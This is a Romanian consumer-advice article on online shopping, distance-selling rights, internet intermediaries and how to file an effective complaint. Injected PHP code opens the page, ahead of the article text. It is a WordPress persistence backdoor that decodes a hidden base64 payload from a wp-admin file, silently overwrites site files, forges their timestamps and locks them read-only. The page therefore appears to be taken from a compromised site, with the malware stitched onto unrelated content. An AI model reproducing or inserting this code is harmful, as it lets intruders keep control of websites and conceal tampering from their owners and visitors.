$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } COMERŢUL ELECTRONIC / E-COMMERCE – O noua atitudine

Datorită noilor informaţii şi tehnologiei comunicaţiei, un comerciant
poate oferi bunuri şi servicii oricărei persoane aflate într-un anumit loc
pe glob.
Comerţul electronic îţi permite să închei un contract de  vânzare
oriunde în lume, fără să te mişti de acasă sau de la birou.

CE ESTE COMERŢUL ELECTRONIC?
Este o formă particulară de vânzare la distanţă, în care contractul
este încheiat on-line.
Comerţul electronic deschide o lume întreagă plină de bunuri şi
servicii din care poţi alege. Totuşi, această modalitate captivantă de a
face cumpărături, poate crea probleme. Deci trebuie să fii foarte atent
şi să analizezi tranzacţia cu atenţie.

Când cumperi de pe internet, aminteşte-ţi întotdeauna:
Află cât mai multe detalii despre companie. Un web site care
arată grozav, nu înseamnă neapărat că şi compania este legală. Ai
grijă să ai adresa completă a comerciantului şi un număr de telefon
înainte de a cumpăra. Evită să cumperi de pe un site care nu oferă
aceste informaţii în mod clar în paginile web.
Verifică ce include preţul:
Sunt incluse taxele?
Sunt incluse taxele poştale şi costurile de împachetare?
Există taxe ascunse?
Nu confirma comanda până nu cunoşti cu exactitate costurile exacte
pe care le vei suporta.
Foloseşte numai site-uri care au modalităţi de plată securizate.
URL-ul sau adresa site-ului trebuie să înceapă cu https// – “s”
înseamnă că site-ul este securizat. Site-urile securizate au facilităţi de
criptare a datelor şi atunci când completezi detaliile legate de plată vei
observa în partea de jos a monitorului un lacăt.
Înainte de a plăti, gândeşte-te cu atenţie la modalitatea de plată.
Există taxe suplimentare pentru folosirea unei anumite modalităţi de
plată? Ex.: cardul de credit.
Păstrează copii ale tuturor documentelor legate de tranzacţie.
Întotdeauna listează o copie a bonului de comandă, a confirmării
comenzii, a condiţiilor generale ale vânzării şi orice descriere a
bunurilor sau serviciilor. Păstrează toată corespondenţa purtată cu
compania într-un loc sigur pentru că s-ar putea să ai nevoie de ea
dacă apare vreo problemă.
Verifică modalitatea de depunere a unei reclamaţii, în cazul în
care ai vreo problemă. Dacă cumperi din străinătate, ai putea fi nevoit
să recurgi la acţiuni în justiţie în ţara comerciantului dacă nu poţi
rezolva problema.

VÂNZAREA LA DISTANŢĂ
Zilnic, mulţi dintre noi achiziţionează bunuri şi servicii prin telefon şi fax,
e-mail sau prin comandă din catalog şi, într-un număr tot mai mare, prin
internet sau prin intermediul televiziunii digitale.

Aceste modalităţi ne permit  să facem cumpărături în orice moment ne
convine, profitând de plăcerea căutării şi fără neplăcerile cauzate de
găsirea unui loc de parcare.

CINE ESTE VÂNZĂTORUL?
Când închei un contract de vânzare pe internet, “interlocutorul” este
un site. Unele dintre aceste site-uri nu oferă nici o garanţie asupra
identităţii exacte a vânzătorului, nici asupra calităţii sale profesionale,
nici în ceea ce priveşte respectarea drepturilor tale. Nu te încrede
orbeşte în toate site-urile pe care le vizitezi.
Trebuie să ştii că există anumite reguli pentru a garanta protecţia
consumatorilor:
•     Site-ul are obligaţia de a furniza anumite informaţii, atât cele care
trebuie date în cazul unei oferte de vânzare la distanţă, cât şi cele,
privind identitatea vânzătorului, cerute pentru toate serviciile
societăţii informaţionale.
•     Ai la dispoziţie un termen de reflecţie şi beneficiezi de dreptul de
denunţare unilaterală într-un termen de 10 zile, cu excepţia
cazurilor când achiziţionezi:
– un produs fabricat după cerinţele tale;
– o revistă, un ziar etc.
– alimente sau orice alt produs susceptibil să se deterioreze rapid;
– un serviciu de pariuri sau de loterie autorizat;
– un serviciu de transport (ex.: bilet de tren), de cazare (ex.: hotel)
sau de agrement.
•     Beneficiezi de protecţia datelor personale.
Trebuie să ştii că site-urile extra-europene nu sunt supuse legislaţiei
Uniunii Europene. Trebuie deci să fii atent şi să afli identitatea
vânzătorului şi care sunt garanţiile şi protecţia oferite.

CE DREPTURI AI CA ŞI CONSUMATOR?
Acest lucru depinde de legea aplicabilă contractului de vânzare
încheiat. Sunt două situaţii posibile:

1.   Dacă vânzătorul are sediul în spaţiul Uniunii Europene
Principiul este că legea aplicabilă vânzătorului este cea a ţării sale
de origine. Oricare ar fi statul membru al cărei legi se aplică, beneficiezi
de protecţia, stabilită la nivel european, referitoare la datele personale
şi  la vânzarea la distanţă. În privinţa comenzilor prin mail, beneficiezi şi
de protecţia oferită de legea română, pentru că de fapt contractul a fost
încheiat în ţara ta, deci beneficiezi de drepturile minime ale
consumatorilor din ţara ta.
Pentru a putea dovedi aceasta, trebuie să păstrezi o copie a
comenzii prin mail fie listată, fie în calculator.
În plus, comerciantul este obligat să se supună anumitor reguli
specifice comenzilor on-line.

2.   Dacă vânzătorul are sediul în afara spaţiului Uniunii Europene
Regulile care determină legea aplicabilă sunt complexe şi variază
în funcţie de ţara în care vânzătorul are sediul.
Este posibil ca legislaţia aplicabilă să-ţi ofere un anumit grad de
protecţie, dar acest lucru nu este decât o posibilitate. Din acest motiv
trebuie să fii deosebit de atent şi să-ţi iei toate precauţiile posibile, în
special să citeşti cu grijă condiţiile generale ale vânzătorului.

INTERMEDIARII DIN LUMEA INTERNETULUI
Aceşti oameni sau companii îţi oferă posibilitatea de a consulta,
oferi sau schimba informaţii cu oameni aflaţi oriunde pe glob
Acest schimb de informaţii este posibil datorită intermediarilor de
genul motoarelor de cautare, furnizorilor de servicii internet etc.

Cine sunt aceşti intermediari?
Sunt oameni ale căror activităţi constau în găzduirea, transmiterea
şi oferirea prin internet a informaţiilor care aparţin terţelor părţi.
Rolul acestora este limitat la a stabili legătura între diferiţii
participanţi.
Activitatea lor are un caracter pur tehnic, automat şi pasiv.
Nu au cunoştinţă de conţinutul informaţiilor transmise şi stocate şi
nici control asupra acestora.

PRACTICILE ILICITE
Ca şi în “viaţa reală”, unii comercianţi care operează pe internet
recurg la folosirea unor practici ilicite (exemplu: furnizarea de
informaţii false).
Uneori aceste practici sunt în detrimentul intereselor
consumatorilor.
Totuşi, adeseori este dificil pentru consumatori să se bucure de
drepturile lor legitime în aceste circumstanţe.
Toate tranzacţiile pe internet lasă o urmă electronică, deci este
posibil să identifici comercianţii care au procedat ilegal.

ÎN CE MĂSURĂ POT FI FĂCUŢI RESPONSABILI INTERMEDIARII
Teoretic, ei nu sunt responsabili pentru informaţiile găzduite şi
transmise pentru că nu au nici o obligaţie de a verifica materialele, dar
anumite condiţii trebuie totuşi respectate.

Dacă descoperă că prin serviciile lor sunt desfăşurate activităţi
ilicite, trebuie să informeze autorităţile competente.

Dacă nu fac acest lucru, ar putea fi făcuţi responsabili pentru
consecinţele acestor activităţi.

Informaţii

www.anpcppsr.ro
www.bnr.ro
www.birouldecredit.ro
www.dolceta.eu

CUM PUTEŢI FACE O RECLAMAŢIE EFICIENTĂ

– Nu aveţi reţineri.

– Aflaţi care sunt drepturile dvs. înainte de a porni la drum.

– Obţineţi mai repede ceea ce doriţi, dacă vă păstraţi calmul!

– Prezentaţi faptele exact, fără alte comentarii.

– Spuneţi ce pretindeţi: scuze, înlocuirea produsului, restituirea
banilor, servicii mai bune sau compensaţii.

– Vorbiţi numai cu cineva care are autoritatea de a acţiona.

– Păstraţi într-un dosar toate informaţiile de care veţi avea
nevoie: reclame, comenzi, chitanţe, certificate de garanţie,
instrucţiuni de folosire, cărţi tehnice, dovada de plată, scrisori,
datele la care au avut loc discuţiile şi numele persoanelor cu
care aţi vorbit.

– Dacă trebuie să trimiteţi oricare dintre aceste documente
companiei în cauză, trimiteţi o copie şi păstraţi originalul.

– Acţionaţi rapid, imediat ce aţi descoperit problema.

– Prezentaţi-vă de fiecare dată: numele, adresa, numărul de
telefon şi adresa de e-mail, alături de numărul de dosar la
compania respectivă, dacă este cazul.

– NU AMÂNAŢI !

By o9admin